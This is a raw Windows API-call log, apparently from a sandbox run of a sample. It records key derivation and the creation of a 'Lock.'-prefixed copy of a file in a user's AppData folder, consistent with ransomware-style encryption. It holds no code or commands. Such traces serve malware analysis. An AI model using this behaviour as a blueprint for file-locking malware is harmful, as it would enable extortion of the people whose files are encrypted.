lpMultiByteStr=0x2aaa348, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0122.262] CryptDeriveKey (in: hProv=0x9beb38, Algid=0x6601, hBaseData=0x9a47c0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4880) returned 1 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0122.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0122.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0122.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0122.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0122.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0122.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0122.264] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.264] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0122.264] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.264] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0122.264] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0122.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0122.265] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0122.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11) returned 0x29f7120 [0122.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7120, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0122.265] CryptDestroyHash (hHash=0x9a47c0) returned 1 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0122.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0122.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0122.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.266] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0122.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0122.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.266] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/DZjNZY.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dzjnzy.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0122.267] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.267] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0122.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0122.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0122.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0122.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0122.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0122.267] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0122.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0122.267] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0122.267] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0122.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0122.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0122.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0122.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0122.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0122.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0122.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0122.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0122.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0122.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0122.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.268] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0122.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0122.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0122.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0122.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0122.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0122.268] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.DZjNZY.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.dzjnzy.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0 [0122.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0122.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0122.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0122.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0122.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0122.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.269] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0122.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0122.269] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0122.269] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0122.269] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0122.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0122.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0122.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0122.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0122.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0122.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0122.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0122.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0122.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0122.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0122.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0122.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0122.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0122.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0122.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0122.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cd0020 [0122.275] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0122.275] ReadFile (in: hFile=0x4f4, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x98c4, lpOverlapped=0x0) returned 1 [0122.276] ReadFile (in: hFile=0x4f4, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0122.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0122.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0122.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x98c4) returned 0x2a9a140 [0122.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cd0020 | out: hHeap=0x2af0000) returned 1 [0122.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 